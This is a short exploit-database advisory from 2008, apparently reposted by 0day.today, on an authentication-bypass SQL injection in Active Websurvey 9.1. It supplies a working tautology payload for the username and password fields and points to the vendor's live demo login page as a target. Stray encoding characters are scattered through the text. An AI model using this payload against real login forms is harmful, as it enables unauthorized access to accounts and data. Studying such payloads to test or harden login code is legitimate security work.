id: 4299
date: 11/29/2008
title: Active Websurvey 9.1 (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

=====================================================================
Active Websurvey 9.1 (Auth Bypass) Remote SQL Injection Vulnerability
=====================================================================


A [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
A  A 
A [~]Vendor: www.activewebsoftwares.com
A  A 
A [~]Software: Active Websurvey v 9.1
A  A 
A [~] Date: 28.11.2008
A  A 
A [~] Home: www.ahacker.biz
A  A 
A [~] contact: N/A

[~] -----------------------------------------------------------
A  A 
A  A 
A [~] Exploit:
A  A 
A  username: r0' or ' 1=1--
A  password: r0' or ' 1=1--
A  A 
A  A 
A [~]login 4 d3m0:
A  A 
A  http://www.activewebsoftwares.com/demoactivewebsurvey/SurveyTaker.asp
A 
A [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-23]  #